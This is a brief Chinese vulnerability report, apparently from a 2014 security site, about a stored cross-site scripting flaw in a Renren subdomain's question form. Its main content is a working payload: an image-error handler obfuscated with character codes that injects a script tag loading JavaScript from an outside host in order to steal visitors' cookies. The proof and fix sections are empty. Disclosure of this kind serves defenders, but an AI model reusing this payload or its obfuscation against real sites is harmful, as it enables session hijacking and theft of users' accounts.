人人网某分站存储型xss第二弹下载
-
来源:黑吧安全网 浏览:945次 时间:2014-04-29
存储型xss,可打cookie,引用某牛的话勿头痛医头脚痛医脚
详细说明:
http://dellcqg.renren.com/Qa/ask 单引号被转义
构造
<img src=1 onerror=document.body.appendChild(document.createElement(String.fromCharCode(115,99,114,105,112,116))).src=String.fromCharCode(104,116,116,112,58,47,47,121,108,97,120,102,99,121,46,53,48,48,121,117,110,46,99,111,109,47,120,120,120,120,115,115,120,120,120,46,106,115)>
可打到cookie
漏洞证明:
修复方案:
我是菜鸟,厂商比我懂的
上一篇: 大连万达某业务命令执行漏洞下载